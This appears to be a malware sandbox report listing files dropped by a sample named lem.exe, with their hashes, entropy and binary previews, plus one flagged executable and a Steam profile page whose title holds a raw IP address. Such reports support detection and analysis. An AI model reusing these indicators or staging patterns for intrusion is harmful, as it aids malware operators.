                                                                        SHA1:3BBCE34D625B839A8754DAEFD29EDB9DF04665F4
                                                                        SHA-256:280F2804D6CE0FB1C75C0531AC81EDDF778CA80D75BAD62DCBE75AC055F4DA70
                                                                        SHA-512:4426EF65F18E9559352FA35E517C77A9CCD2429318D4864FCDC881F75081D74DBA61FBE895F28309265769ACFA83EBD3A4A26BB2E8C4F5669404319FF0534255
                                                                        Malicious:false
                                                                        Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: gi_z2 https://188.245.87.202|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link h
                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):893608
                                                                        Entropy (8bit):6.620254876639106
                                                                        Encrypted:false
                                                                        SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                        MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                        SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                        SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                        SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 7%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                        File Type:OpenPGP Secret Key
                                                                        Category:dropped
                                                                        Size (bytes):327012
                                                                        Entropy (8bit):7.999502073451394
                                                                        Encrypted:true
                                                                        SSDEEP:6144:x3mfBFUatTLlUC+1IwlxSkztcjIs0B4wtD3OpkeiKdLbRaia:F0Zz/wlJuGKwSiKd/RRa
                                                                        MD5:18F62E94867B896CFA8E11466571C57D
                                                                        SHA1:623C15C4520C8AFB7920A05B543FFED08EF0BEC1
                                                                        SHA-256:877A4011CB5C924756363E451C752BE5931945CD2077FBB56CFBBA29F3A3D6DE
                                                                        SHA-512:F148144E6684D9DE6516199E927F711A6CAC0B37907A6845F860BECE194CA0BCCC16BB11103401266D8B49F1D298800F12D2E1C4D6443B5B1D7BAA03AA4DCE97
                                                                        Malicious:false
                                                                        Preview:.u...."..QAm..b..n.>.....#..........(.<.._.Ir..-wj;'..|"..u..R....h.-F......."..0?.qH.}..,.....t..k?I$0%.7..&qS.4!gVclT.'i..d+;.@..E....L.h......eQC.O.....D......=..:K....Og.^!...?.}]...c..l.;.....+...z.0..."..&rD.'...2:L....+.H..y...3.....e@..E&... ...Go.My..b.\.|.$NP:>....9.4.Y.{..c.JC.P..."..>]|.^...;c...O......(5...6.G.Y. pQ.......(`A01....U...(..S..r".z.xOy..Q.^.^....8.O..q<..5&..F.Y......H3,.._Wx..9I..M2[.t...qL..w>NkayXcJhE..{H...K^...Z>.J..b...T..*(.../....5..-S..X.w2.,./.a.f.?.0.jc.n.b'mh.P...@.Ap.5..>.=.R.f`...u.........f..."J\ny./.......9&#h..Z.8..@...w.C.>z.z..g!.....S.C .J.p.5.J.w..............I...+..Z.{..D./._.....NEX..2.m..._.....D.*.kh...}].Yz\mx.&.@A...._....$K.=tD.v.E0. V...a....y...u.m...ZI-...5.Q1.g....p.G.W.?s.QX.G....(N..+.XQ*.gU.l..>h....4.@.-.'......z....O..d..b~..-..0;.7.N.N);..h.7.~L*.X.YD ..;.NFx.wC...%.....F.4.n..c........2!y.?..FT2..u.U.D.....A.eH.......rP..I.a'M.e.g...~y..S}...T.th.#..=...Jn..V...._.m..
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):37888
                                                                        Entropy (8bit):6.670175721393079
                                                                        Encrypted:false
                                                                        SSDEEP:768:XnPml5Dhh/xGophpZddR6Bzyy3P8uMxworO4aIPxwW9iwczQqrQfy0cSoWtJyDTw:3PmfP/b/psgrO4aK9iwcznrQfy0c4cDM
                                                                        MD5:CA91AA4B24FBF692074F6B7C3744B716
                                                                        SHA1:9B10D76477DD84FE66E846F44BDBD08F5947DFA3
                                                                        SHA-256:A5526DDDD5E0EA2D1D4DA2F1E02A1526E6A55A6659AC7188951CAAF59355EB5E
                                                                        SHA-512:80941620390C3F4830F03C72F7284BE1C02FD361764B6537D84525BE97035C908C68629B938E1BEF2ACB6CE64CE263521169DB89683D3C159BC7C28C5D21DC50
                                                                        Malicious:false
                                                                        Preview:....s.3........;E.t8.E.<W@.}..E.;E...q.... .......t.;.....v..Vh9............E..}.....I..;....G...E...@..P.u.V.u..u...F..........G......}.9E.t.f.......f#......f;.u.....}.;}.w..G...M.........;U........F|.E.;...`..........}...}.t-..%....=....u.............%...............}................KK..........y.I..A.....E.hJ....."?J..F|.M.;........]......E.......t/..%....=....u!..G.......%..........E..........................KK..........y.I..A.....E.hJ....."?J............gJ.t..E..<G.E.;...l......E.u..].}........t ;.r.;.....v..Fh.............#....E.@.E.;E........%.......t.;.....v..Fh.................E..}.....G..;....E...E...@..P.u.V.u..u...D.........xE......}.9E................}...A...S.............$.p.D.;U........G..E..N|;...@....V..........u.F.PQ...A..............U........t.;V|r).~..u#.~..u.f..f;F4u..Fh........................}..U.;~|s!f.......f#......f;.u........}..U..E.@.E.;E...T.........V....+.;...o...f..f;F4..b.............U.f..f;F6..L.........M......}J;........N|.E.;.sB....}.;.
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):62464
                                                                        Entropy (8bit):6.518402019185416
                                                                        Encrypted:false
                                                                        SSDEEP:1536:rqqdGYynTDYL7Q+mr9R2VgjGpS2Ehkjxx:eaGdDqeb2Xo2IkVx
                                                                        MD5:6F2B48A711ED46BFDBFF1F757796BB7F
                                                                        SHA1:5E25902829F80F4466374F5EA57E5C2882580D60
                                                                        SHA-256:10B792B6356593166D5C2D19C5AB78A5C4D88DF13C2E5C9DC21519C403F18A44
                                                                        SHA-512:61CAE43F9F1F759A76DA09D572B9031F9E580F77E7852D215562DBB593C304AB1C5A00B09EA2CFD63D999538F94DA301468D3E9C2106398728E4D8F45D0D326C
                                                                        Malicious:false
                                                                        Preview:L$4..L....D$0P.D$dWP..h......D$`.L$4P.{I..P.L$..v..j.S.D$.PV..r......L$...|...L$4..K...!.M.h..I..~...T$\j.j....H....*..._^3.[..]...U.......S.].VW.M..{..u..L,I....C..p.....{...F..8.C..0....{...F.......W...&x..Y<.u..M.......P. ~...8hL,I.W..e..YY.M...u.h..K...h..I...}...U.j.j....H......_^3.[..]...U.........SV3.W....$.....L$..|$...$......$......@...L$(..@...]..{..u..C..H...~....t..D$....3.L$..C..0....{...N..@.K...:........................C..0....z...v..L$..6J...L,I..L$.V......u2......P.L$...J..V.L$..lF...C..0...z...v..L$..4E...C..p....~z...v..L$,..I...L$(..}....t/.D$,.L$(HP.(C..f.8\t..u.....z..3..F.............C..p....)z...V..L$.3.S.t$...i..YY.........@j.........$.....v....t@j.........$.....iv....t(3.SP...H....A*...u....Iz...F............L$H.y>...L$h.p>...L$X.g>...L$8.^>...C..p....y...N..D$8P.D$.P.D$`P.T$t.H-......L$.3.P.)B..3.f9.u-Q.L$<..B..3.f9.u.h.K..L$...D..hL.K..L$<..D...D$hP.L$,.zH...D$XP.L$,.C...D$.P.L$,.C...D$8P.L$,.C...C..0....x...N..D$HP.T$,..p..Y.L$H.l..<.u.8D
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):48663
                                                                        Entropy (8bit):6.842147975262886
                                                                        Encrypted:false
                                                                        SSDEEP:768:A2+9BSCVoyO15DuOKHnrxbxZiUCu2iPaLTQ7Q1tCwqVLwQVn8qT4O:A2+9BBVgCOa1ZBPaPQaEwo0yv
                                                                        MD5:8DC888B7C0B738A1E0AB53D78BEB987C
                                                                        SHA1:E6A726461D4D982E6FF93CA43A3FC5BCC1E72024
                                                                        SHA-256:F716CFD3992DEDC91FD387460EEF10278ED02A3712ECD4D44DE47434D047B558
                                                                        SHA-512:5CF1E4C43A04C8250B96E91FE2227FB91B949092EF26227D634E465CCC29E5E735A212B6FF0BBABBC394CAB709FC873F6A87C576C79FE1E4255B800A5F46DB47
                                                                        Malicious:false
                                                                        Preview:.]...]...]...]...]...]...]...]...]...a......................................................]...]...]...]...]...]...]...]...]...]...]...]...v......................................]...]...]...]...]...]...]...]...]...]...]...]....................................k......................^...]...]...]...]...]...]...]...]...]...]...]...]..................................d...]...]...]...]...]...]...]...]...]...]...]...^........................k.....................................]...]...]...]...]...]...]...]...]...]...]...]...^...........................v...]...]...]...]...]...]...]...]...]...]...]...]...................................................................e...]...]...]...]...]...]...]...]...]...]...]...]...^.................l...]...]...]...]...]...]...]...]...]...]...]...]...d......................................................................^...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...].............
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):13312
                                                                        Entropy (8bit):2.04809099681218
                                                                        Encrypted:false
                                                                        SSDEEP:96:HunQmUO4IYoySAHbUJOfwq2QAyUHMqEP197gjV9kz76/IqRCH:H3LHPHTo1Q319sx9kaq
                                                                        MD5:45AC61695010B494AC7753A47211A9A6
                                                                        SHA1:87A75C97E7F99870AAD40B8A5BD98EDD453D4D5A
                                                                        SHA-256:1CAEC310BB5559F84C05061A93A7EC4DDD6D617192F7B8CF2F990913F23A4479
                                                                        SHA-512:B590BDABDD023A25CCFA0AB7D03860DA962CE4DD8A484AF5120BB8355FFF306B6F02D68B82CA74554970D99AFDE896DD837D3FBDC77539267D4B1C51DC4192E1
                                                                        Malicious:false
                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):36864
                                                                        Entropy (8bit):6.591474314445812
                                                                        Encrypted:false
                                                                        SSDEEP:768:y9Qywqp9sK1xhNGE0psu0nM8+aZKINulI1r:gMK1zN90psu0nMOKzlW
                                                                        MD5:AFE142FBAA8F964884B5E1B306E412F4
                                                                        SHA1:1FD19640B044E83DE5075B6320680307156EA217
                                                                        SHA-256:183F0C5F3BCDC8CF4AF78080681FE13D4AB8AAC8C167DBB8C2B8A440983B5EE2
                                                                        SHA-512:CB217FD62A4D0DCE5BBA5304CDE352CA3ED0D731381BB47E93633ACC7FCFF634EB4995A284A5B683A6BF1A90630F1D795E9B7D06FFC09C1D7D1E14412641DDE3
                                                                        Malicious:false
                                                                        Preview:.=...............A..$...A..u..u.R.V...........3.M..].jw..C...CX.].f9...q....._^[..].f.>p.....G...N..."..t.j ..+.[.....BKu.3.............G....E.3..t..b...3.....V........G..jw_.JF.......F...O......G..j.Y.M..Z.......9........G..j..ZH..j..SH...I.-.A.W.A...E...E...E...E...E...E...E.~.E.p.E...A.c.E...E...E.j.A...E...E.r.A.&.E.I.A...E...A.Q.A...E.9.A._.A.z.A.9.E.A.A...E...E...A................................................................................................... ....................................................U..QQSV..M.W.......>;.w:.E..E.3..C.........M.............G...}.....G...F._^[..].e......U........e..SVW.}.3..!......G...>ERCP...G...F....eG....F$..N&.....F"...F....N.E........F............N0.M...u..E.3.Pj....]....M............D.....H...........L.....@...j ..P....E.j.P.I`...F...D.............U.Q.M.P.M...YY3.A;........M..E.j..v....P........E................F..9].u...~MjL...gJ...3.Y..th.s @3....s...,....~.j 9}.t*.F..E.P.F.P..@...E......~;.N...F(.._
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):24576
                                                                        Entropy (8bit):6.572783083155024
                                                                        Encrypted:false
                                                                        SSDEEP:384:eM1geStviK3YDejvRb0IyyZxSNBtFuskTdKvMxGHr4skzqs8cEaRYIbrHr1beQ+g:eM1gHYqj51rZxSNnLUshL5kf87wYeHZb
                                                                        MD5:A7D0496A90E3889A464F0860183E2570
                                                                        SHA1:9299475084EDB0361E1FE026AFBE3D2BED906001
                                                                        SHA-256:5542FD17FD4199D8BBAEF1D82115A9E1F1F17C5E6409B17C1DE92F00077E3557
                                                                        SHA-512:43093E7A6DD6ACAF6128E82439880F69D0676512D6951A7D2628964FD10B153DE59549BB97A1A9506366A16C871E00F3715695CF7CA7C6DA976CE05511870E52
                                                                        Malicious:false
                                                                        Preview:w0..X.I..w....Y.G.P..H.I....>J._.U...E..V.....>J.t.V...Y..^]...U..V.......E..t.V.q...Y..^]...Vj8......Y..t.V.......^.3.^.U..SVW...w.V..\.I..}..._.t".w..M..I....w..M..w.....P.&......V..`.I._^..[]...SVW...w.V..\.I..G4.0P..l.I.=....u.3.9_.t...V..`.I._^..[.U..S..VW.s.V..\.I..{..s..M.......s..M..s......P....s.j..s..:.......C.....V..`.I..._^[]...V..>.t..6..X.I..&.^.V..N.......N.......N.^.....U..W....u.!...j..u.j.R..\.I.PW..\.I.P..d.I._].............SVW..3.2.O ..t)........t.j.^...O..m....O .I.u...j...!w ...t...t.....9.O..F..../.O$..t(......t.......O..'....O$.I.u...j....g$..........t......u.!w._..^[.U.....SVWtM.].3.}.....t.9.u=.u.9.t4.E.9.t-..................j.......E...j..........YY..3._^[]...U......VW3..E......}..}...t..u...d.I..u......uI.>.._^..]....E.t!.u.....u.W.E.PV.u...h.I...uS......u...d.I..u.....t....t.j.....F...Y.Wh....j..E.Pj.h...@h@.K.....I......t...t....U.j......Y........E....d...U......VW3..E......}..}...t.j...d.I..u......uG.>.._^..].....t!.u.....u.W.E.P.u.V..h
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):6.283164421428037
                                                                        Encrypted:false
                                                                        SSDEEP:384:ZUi4kBM+bYXcqmjw0YhIR6s6bMkx875rLk+fBDsOc/WY7Jx2pQ44Gkvm:Q5eqMw0jR6s6bvx875rLjDsOc/WY7JxE
                                                                        MD5:83CC36E7D1F024E855DA1721F42EDEBE
                                                                        SHA1:8D958775289D4C52BB7035A7F6AB5C97AD47053C
                                                                        SHA-256:B6B2AC5A581567CB095A6519CF0AC50D20BFB5B0D95B69CCCACC84714A925C8A
                                                                        SHA-512:B0F0B6100580B5A4AD7C506F8D6F797F7D8AAD8D1016983BAE0F0ABF10A54D60CAA74C4AD95272282CCE46DD8609C1BABBB8652D0F7E2C3383D35946E7C0811D
                                                                        Malicious:false
                                                                        Preview:.......;.......3.............E..<}....;.~......3...4.+......;.....#...i...G.......v.;.r..V....P..E....~....I...@..fD..fD..fD..fD..}...M.u.j.j.j.j.j.3.........c...+..~.....T....E..E..E..E..E..E..............F(.F(;F,...`........ gJ...C....K.]......E........].E.E..S..M.@P.u.V.u..u..c.........tL= ...u%..K...K9...........f.;wt.f.9w..................C...C......f.;wt..M..........M.........f;.t...w........C.f.<Cw..Ct.f.;x.............U..E...M...;E...{]......].....E......E....E........E.....+Ft...E.......E......r...........E..M.@P.u....V.u.... gJ..u...C.O..........................M.E..Ft.E.......H.......E.......9E........E....C.....E.f.;v.......=$.L.........d.........C...h....F...l....Fx..p....F|+Fx....t....E.+Fx....x....E.+Fx....|.....C..E...C..E..E..+....E.........E...u..E............E........E...d...P..$.L..................U..E........E....3.E..s....M..............D..$...D.................C.=..........;A.t{3..t...9.......h.....K...N$.F0..H..K..E....H..........E..
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):24576
                                                                        Entropy (8bit):4.975702259687121
                                                                        Encrypted:false
                                                                        SSDEEP:384:4mE5lTbyuT2sWjtudNIDvFQC7VkxhPfp2hu9i09PrOa3Hww8:4mEusWjcd+DvFQC7VkrHpIu9xhSaAw8
                                                                        MD5:F68968CD4FA1D7D4466A5DCE6F4C84F6
                                                                        SHA1:EA8C31DA0FC2B05E7CDD63AFF5901D44D238D037
                                                                        SHA-256:ACF7387994A2158A43CE481FE01F854AF5E43F7E4ACD078C5A0DABAD9891E43D
                                                                        SHA-512:9BB47D45FBFB03990F2A795E9F14A5082E00E30543A4A03C4853F8D181FE6A58755FCFDD70BD213C3DF547F72AB2B54C71A0DBFEBAB429036435B51223211E38
                                                                        Malicious:false
                                                                        Preview:unMonTueWedThuFriSat...JanFebMarAprMayJunJulAugSepOctNovDec....TZ............J..... .J.....(.J.....0.J.....@.J.....H.J.....P.J.....X.J.....`.J.....h.J.....p.J.....x.J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J. .....J.!.....J."... .J.#...(.J.$...0.J.%...8.J.&...@.J.'...H.J.)...P.J.*...X.J.+...`.J.,...h.J.-...p.J./...x.J.6.....J.7.....J.8.....J.9.....J.>.....J.?.....J.@.....J.A.....J.C.....J.D.....J.F.....J.G.....J.I.....J.J.....J.K.....J.N.....J.O.....J.P.....J.V.....J.W.....J.Z... .J.e...(.J.......I.....0.J.....<.J.....H.J.....X?I.....T.J.....`.J.....l.J.....x.J......BI.......J.......J.......J.......J.......J.......J.....4?I.....L?I.......J.......J.......J.......J.......J.......J.......J..... .J.....,.J.....8.J.....D.J.....P.J. ...\.J.!...h.J."...t.J.#.....J.$.....J.%.....J.&.....J.'.....J.).....J.*.....J.+.....J.,.....J.-.....J./.....J.2.....J.4.....J.5...(.J.6...4.J.7...@.J.8...L.J.9
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:MMDF mailbox
                                                                        Category:dropped
                                                                        Size (bytes):27648
                                                                        Entropy (8bit):6.913742648072757
                                                                        Encrypted:false
                                                                        SSDEEP:384:g6HDyOpbM136KeBzC6GFe46JRoGWbHkdzfkfiCbwHmAjesFUpa:gcDP8WBosd0bHazf0Tye4UA
                                                                        MD5:12599D2A0D8467DBC2722468687E36FD
                                                                        SHA1:F35F416FED0A6EDDE8329B90C89FB139338EFE6C
                                                                        SHA-256:A16AF249569396606BCC03F0E2B828187E40E1F507EF07E8150CA1A439D47C20
                                                                        SHA-512:7E17C23FEE183B223E5017D89FDAF15064DED3DD242C7153E8526C579A521862EAEF63E014DC48F392718FA9138546D75137C5C0680F6EACBD711A69AD2DF43A
                                                                        Malicious:false
                                                                        Preview:........!EEEEEK..wEEEEEEEEEEEEEEEEEEEx..4................u.......=..................>v..8*...............q)....jr.s.................t....<................l.....m.nV...............o.....p................g'.....h.ij............._k.....E.................^_....`a.bcccccde>.....f
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):55296
                                                                        Entropy (8bit):6.478568072936293
                                                                        Encrypted:false
                                                                        SSDEEP:768:9RH7ACViIeTxYEhqHGnqA1sojvqt0hDthFb0GuCsuYCV5mhzw4NKCFOsQW+Bfm4G:96CV21YEsmnq7Cv/+/Coc5m+4Xf8O46t
                                                                        MD5:E7A924FF527BD91CA864A5E47D7D57D7
                                                                        SHA1:E989789DC0F5EE0D5EDB7CC99AF17EF937328FF6
                                                                        SHA-256:9949938D88359593913780498287069B7B8147D59AFC036EE9D9DF39237008C9
                                                                        SHA-512:137B75CC4D24FB03A03A2B4CACB74B054E5CF075D4C8957387C689614D2BC4CDA1935FE4635F3512F268C6558C82DC8B55DA92D11A7564EC0818EBA2B6D55F2C
                                                                        Malicious:false
                                                                        Preview:C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y.
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):33792
                                                                        Entropy (8bit):6.659803565930362
                                                                        Encrypted:false
                                                                        SSDEEP:768:KlRKw4sWGuv6crjQAVlvZEx2zinQD2tR/i01g:Klao/RIs2ziQD2tR/i0+
                                                                        MD5:1852895869138CA95C88B6D2ACAF35E4
                                                                        SHA1:BF4665E82C3D713305EE890F92C4622DC42BF31E
                                                                        SHA-256:443A1E33174C5F6C5AFB73E58DBF6D7CD9957F96AF924478C13D13FCABA4BB1C
                                                                        SHA-512:34296090D08A68FDE2397C010755C668A63736046C4D2A10B0490C75893DFD9B1CC300BE6261479ED692D4ED202C1CCA474010B162AEDD82511FC2BD632889D2
                                                                        Malicious:false
                                                                        Preview:............l.........;...^...........t3....O;.s*..<.u..B.;.s..A..8.u.............L...A..u......+...1.r.............YL........D.........t..........:.u.GB;.r.........u ..............u...0...............................9X.u....................+p..p.j.....YL.[.D.........j.S..................;.u?.......B....+J.;B.....#.......v..B........8.u.F@C;.r..B.. ...TSQ.......X........y.....\...........;.w..@..t..@.......t..p.................YL..D...t.F.........u.......+...u.....^[.M.3._.i....].j.h..K..,...e..3..u........u............81......%V....Y.e..V.,...Y...}..E.............,...u..}.V.....Y.U..S.].V3...u..Y...........0......hWh....j...*....YY..t=.<...plW.1=...E.YYWj.Wh._B..u.._TV.GX..h.I....w...u"..<.I...W.....Y..t.V..-..Y..._^[].V..x.I....t....j.h..K..+...@<...e...pX.PTY. ....M.....E.QP.`r..YY.e..u.......V."<......t..~..t..v...X.I.V.;..Yj...p.I..U...l:..P..?....Y..u!.u..W:..P..?..YY..u(..<.I.P..p.I..M.Q.AT.BT.AX.BX.A..B..):...>......=.aL..tn.....\$..D$.%....=....u..<$f..$f
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):51200
                                                                        Entropy (8bit):6.000013914688802
                                                                        Encrypted:false
                                                                        SSDEEP:1536:v0w9/5Sh4ztrgWVrZ+In23SwFc1vtmgMbFuU:v0g/bZaUAg0FuU
                                                                        MD5:0B03EC2247369D1C12C3358DC8CA446D
                                                                        SHA1:F91E66EF206AC9281C0CB01DC2EDAD35B44AD370
                                                                        SHA-256:AC6C5C42C7B866E196C00D91D38C105CE1EC6CEB9D42ED42D19966D3A25C3C5B
                                                                        SHA-512:622241F99D3F6560793B9A63F2EA3FFD877B2C33C4557DD910F46A097FF3B04CE637FD7348B67BB412E5DCE4F5206043DA73F35F87AFDD6FDE2BF99196A9C1DE
                                                                        Malicious:false
                                                                        Preview:_^..]...U..Q...xL.VW...t...xL.......0..3..u...wL.....q...E....u.3..Z.}....xL.tM.E...P.E.P.u...n....t.M...xL.....M....$xL.............u......................_^..]...U... W.}...9.ul..:.uf.E.P.E..0....I..E.E.E.E..E.P.7..p.I..E.E.E..E.E.E.E..E..E.P.7..p.I..E..u..E.E..E..E.P.7..X.I._..]...U..].N\..U.....E.wL.P.E.P.u...m......r....M...xL.S.].V....M.W.0.$xL.....8.......E....u.<.t"...u.<.t....u...t.......u.<.t.<.u..N.........t.W......~8.tB..u.9.t..7..H.I...t..7..L.I...t".$xL..M............<.t....;.....t.2.....j.V..wL..kl....E...t.....x....M..U..E.....wc...G.H..$.'.H....uPRQ.7V.u...wL........=..t......ua.......]...~.;.t........RQ.7..wL.VP..........]..$xL..M.......xP.t.j.j.h.....pP....I..._^[..].........u.......u!......P......Ph.....7....I..M..U.......~.;E.u........RQ.7..wL.VP......p....].S.6....I......[....u..u..7VS.....j..7..\.I......t.j.j.h.....6....I..U.M........SV..wL.......M..U........H..H..H..H...H...H...H.+.H..............................U....xL...xL.SV.u...
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):9216
                                                                        Entropy (8bit):4.144988478391688
                                                                        Encrypted:false
                                                                        SSDEEP:96:wxaWKdRfSTxmJg4kbqkaTbaxTHqQhx/quRzsJ5zz1jpC82mW+hiclKJRe/fKQ1rJ:kCV6qTb4Ph5qRtFpC82rcx/hQ4v3U+n
                                                                        MD5:14DBCDCA4A0DAD5C96A0AEC4AB29A13D
                                                                        SHA1:33CE868FA8300564119606C55BD4F335300C72F8
                                                                        SHA-256:866F7FFBBFC2F00F20B89C4A00E2AD55F1F89747F85FACD0A0FCACF897D2AB95
                                                                        SHA-512:5B976F18B18FADC24C44620442F45DC05F9104B6B12F943D8243B171425CA733E8FE1D89F4E2A1B7A8F5983A3B45BB398C328D3FDC08779DFED8325839D81265
                                                                        Malicious:false
                                                                        Preview:.w.i.t.h. .n.o. .m.a.t.c.h.i.n.g. .".S.e.l.e.c.t.".o.r. .".S.w.i.t.c.h.". .s.t.a.t.e.m.e.n.t...:.".E.n.d.S.e.l.e.c.t.". .s.t.a.t.e.m.e.n.t. .w.i.t.h. .n.o. .m.a.t.c.h.i.n.g. .".S.e.l.e.c.t.". .s.t.a.t.e.m.e.n.t...O.R.e.c.u.r.s.i.o.n. .l.e.v.e.l. .h.a.s. .b.e.e.n. .e.x.c.e.e.d.e.d. .-. .A.u.t.o.I.t. .w.i.l.l. .q.u.i.t. .t.o. .p.r.e.v.e.n.t. .s.t.a.c.k. .o.v.e.r.f.l.o.w...&.C.a.n.n.o.t. .m.a.k.e. .e.x.i.s.t.i.n.g. .v.a.r.i.a.b.l.e.s. .s.t.a.t.i.c...4.C.a.n.n.o.t. .m.a.k.e. .s.t.a.t.i.c. .v.a.r.i.a.b.l.e.s. .i.n.t.o. .r.e.g.u.l.a.r. .v.a.r.i.a.b.l.e.s.....B.a.d.l.y. .f.o.r.m.a.t.e.d. .E.n.u.m. .s.t.a.t.e.m.e.n.t...3.T.h.i.s. .k.e.y.w.o.r.d. .c.a.n.n.o.t. .b.e. .u.s.e.d. .a.f.t.e.r. .a. .".T.h.e.n.". .k.e.y.w.o.r.d.......0.E.x.p.e.c.t.e.d. .a. .".=.". .o.p.e.r.a.t.o.r. .i.n. .a.s.s.i.g.n.m.e.n.t. .s.t.a.t.e.m.e.n.t...*.I.n.v.a.l.i.d. .k.e.y.w.o.r.d. .a.t. .t.h.e. .s.t.a.r.t. .o.f. .t.h.i.s. .l.i.n.e.....A.r.r.a.y. .m.a.x.i.m.u.m. .s.i.z.e. .e.x.c.e.e.d.e.d...+.".F.u.n.c.". .s.t.a.t.e.m.e.n
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):6.7696542532334405
                                                                        Encrypted:false
                                                                        SSDEEP:768:p/ES4KY2lfwMwstd7t+Jv/awuUw1Q37iehoxQeU3ecejLixwghYEYP3iSRWG7O:Z27EM/awuUwU7KxQefixl2vqWWGC
                                                                        MD5:BDFD7B1313DDF10521838BE73E198A18
                                                                        SHA1:C45FBB6B497053E245844753D624CA496FD584EB
                                                                        SHA-256:A14DFC374AE5B1AA23702639B30CB774FA4ED45366491BCFF8BBA53146561657
                                                                        SHA-512:D31E67184C1419A612191460F3BB7075733B04FFDF51C7F1C574D686936FB3BBE91211BEB6FE7ABD4DBDF9E71096669457B1FFA38E0D343B89C6A1581C12894F
                                                                        Malicious:false
                                                                        Preview:......+... ...j.PW......P..(.......YL..4.....I........... ...9. ...|...8.....+.0...;...A.....4.....D...................j.[;........@...............................9u...|...........................j.+......^;E.s3..9......f;.....u...D....f.3......f.;............r........<.....$...+.j... ...PS......P..(.......YL..4.....I...@.....4............. .....@...9. ...........<.......0...+.;E.............]...8.............................H.....8...+......;.s;..7........8...f;.....u.j._f.8.....8......f.0............r.3.......VVhU...Q..H...+..+...P..PVh........I...@.....4.....<...........3..@...j.+... ...RP..........$...P..(.......YL..4.....I...t...@..... .....<.....@...;.......<.I...@.......<.....4...;.........8.....0...+.@...;........w...j... ...R.u...0....4.....I.....=..... ...3..G...W...Y.<..0.....(.....$.......YL..D..@t..:.u.3....v..........7.... ......+..[.M._3.^. .....].U.......P.L.3.E..E.......SV.......E.W.u..}.......3.........................................................
                                                                        Process:C:\Users\user\Desktop\lem.exe
